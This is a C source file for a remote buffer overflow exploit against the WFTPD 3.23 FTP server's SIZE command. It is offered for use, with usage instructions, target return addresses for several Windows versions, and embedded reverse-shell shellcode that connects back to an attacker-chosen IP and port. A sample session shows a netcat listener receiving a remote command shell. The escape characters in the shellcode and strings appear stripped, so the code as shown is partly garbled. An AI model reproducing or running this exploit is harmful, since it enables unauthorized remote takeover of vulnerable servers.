WFTPD 3.23 (SIZE) Remote Buffer Overflow Exploit

/*
* wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
* coded by h07 <h07@interia.pl> 
* tested on XP SP2 polish, 2000 SP4 polish
* example..

C:>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444

[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
[*] coded by h07 <h07@interia.pl>
[*] FTP response: 331 Give me your password, please
[*] FTP response: 230 Logged in successfully
[+] sending buffer: ok
[*] press enter to quit

C:>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:wftpd323>
*/

#include <winsock2.h>
#define BUFF_SIZE 1024
#define PORT 21

//win32 reverse shellcode (metasploit.com)

char shellcode[] =

"x31xc9x83xe9xb8xd9xeexd9x74x24xf4x5bx81x73x13xb6"
"x10x92x98x83xebxfcxe2xf4x4ax7ax79xd5x5exe9x6dx67"
"x49x70x19xf4x92x34x19xddx8ax9bxeex9dxcex11x7dx13"
"xf9x08x19xc7x96x11x79xd1x3dx24x19x99x58x21x52x01"
"x1ax94x52xecxb1xd1x58x95xb7xd2x79x6cx8dx44xb6xb0"
"xc3xf5x19xc7x92x11x79xfex3dx1cxd9x13xe9x0cx93x73"
"xb5x3cx19x11xdax34x8exf9x75x21x49xfcx3dx53xa2x13"
"xf6x1cx19xe8xaaxbdx19xd8xbex4exfax16xf8x1ex7exc8"
"x49xc6xf4xcbxd0x78xa1xaaxdex67xe1xaaxe9x44x6dx48"
"xdexdbx7fx64x8dx40x6dx4exe9x99x77xfex37xfdx9ax9a"
"xe3x7ax90x67x66x78x4bx91x43xbdxc5x67x60x43xc1xcb"
"xe5x53xc1xdbxe5xefx42xf0xb6x10x92x98xd0x78x92x98"
"xd0x43x1bx79x23x78x7ex61x1cx70xc5x67x60x7ax82xc9"
"xe3xefx42xfexdcx74xf4xf0xd5x7dxf8xc8xefx39x5ex11"
"x51x7axd6x11x54x21x52x6bx1cx85x1bx65x48x52xbfx66"
"xf4x3cx1fxe2x8exbbx39x33xdex62x6cx2bxa0xefxe7xb0"
"x49xc6xc9xcfxe4x41xc3xc9xdcx11xc3xc9xe3x41x6dx48"
"xdexbdx4bx9dx78x43x6dx4exdcxefx6dxafx49xc0xfax7f"
"xcfxd6xebx67xc3x14x6dx4ex49x67x6ex67x66x78x62x12"
"xb2x4fxc1x67x60xefx42x98";

void config_shellcode(unsigned long ip, unsigned short port)
  {
  memcpy(&shellcode[184], &ip, 4);
  memcpy(&shellcode[190], &port, 2);  
  }     

unsigned long target[] = 
  {
  0x7d16887b, //JMP ESI (XP SP2 polish)
  0x776f2015, //JMP ESI (2000 SP4 polish)
  0x7cb9e082, //JMP ESI (XP SP2 english)
  0x7848a5f1, //JMP ESI (2000 SP4 english)
  0x7ca96834  //JMP ESI (XP SP2 german) 
  };           

char buffer[BUFF_SIZE];

main(int argc, char *argv[])
{
int sock, id, opt, r_len;
unsigned long eip;
unsigned long connectback_IP;
unsigned short connectback_port;
struct hostent *he;
struct sockaddr_in client;
WSADATA wsa;

printf("n[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploitn");
printf("[*] coded by h07 <h07@interia.pl>n");  

if(argc < 8)
  {
  printf("[*] usage:..n %s <ID> <opt> <host> <user> <pass> <connectback_IP> <connectback_port>nn", argv[0]);
  printf("[*] ID list:n");
  printf("[>] 0: XP SP2 polishn");
  printf("[>] 1: 2000 SP4 polishn");
  printf("[>] 2: XP SP2 englishn");
  printf("[>] 3: 2000 SP4 englishn");
  printf("[>] 4: XP SP2 germannn");
  printf("[*] opt - WFTPD option 'restrict to home directory and below'n");
  printf("[>] 0: disabledn");
  printf("[>] 1: enablednn");
  printf("[*] sample: %s 0 0 192.168.0.2 h07 open 192.168.0.1 4444nn", argv[0]);
  exit(0);   
  } 

WSAStartup(MAKEWORD(2, 0), &wsa);

id = atoi(argv[1]);
opt = atoi(argv[2]);

if((id > 4) || (id < 0))
  {
  printf("[-] ID error: unknown targetn");
  exit(-1);     
  }  
  
if((opt > 1) || (opt < 0))
  {
  printf("[-] opt error: unknown optionn");
  exit(-1);      
  }          
  
eip = target[id];
connectback_IP = inet_addr(argv[6]) ^ (ULONG)0x989210b6;
connectback_port = htons(atoi(argv[7])) ^ (USHORT)0x9892;
config_shellcode(connectback_IP, connectback_port);

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if((he = gethostbyname(argv[3])) == NULL)
  {
  printf("[-] Unable to resolven");
  exit(-1); 
  }
 
client.sin_addr = *((struct in_addr *)he->h_addr); 
client.sin_port = htons(PORT); 
client.sin_family = AF_INET;   

if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
  {
  printf("[-] error: connect()n");
  exit(-1);
  }

recv(sock, buffer, BUFF_SIZE -1, 0); 

//USER
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "USER %srn", argv[4]);
send(sock, buffer, strlen(buffer), 0);  
recv(sock, buffer, BUFF_SIZE -1, 0);
printf("[*] FTP response: %s", buffer);

//PASS
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "PASS %srn", argv[5]);
send(sock, buffer, strlen(buffer), 0);  
recv(sock, buffer, BUFF_SIZE -1, 0);
printf("[*] FTP response: %s", buffer);

if(strstr(buffer, "530") != 0) exit(-1);

//SIZE
memset(buffer, 0x90, BUFF_SIZE);
memcpy(buffer, "SIZE ", 5);

switch(opt)
  {
  case 0:
    { 
    memcpy(buffer + 5, "/", 1);
    r_len = 531;
    break;
    }
  case 1: 
    {
    memcpy(buffer + 5, "//", 2);
    r_len = 532;
    break;
    }                  
  }

memcpy(buffer + 7, shellcode, sizeof(shellcode) -1);          
*((unsigned long*)(&buffer[r_len])) = eip;
memcpy(buffer + (r_len + 4), "rnx00", 3);


if(send(sock, buffer, strlen(buffer), 0) != -1)
  printf("[+] sending buffer: okn");
  else
  printf("[-] sending buffer: failedn");
    
printf("[*] press enter to quitn");
getchar();    
}

//EoF

//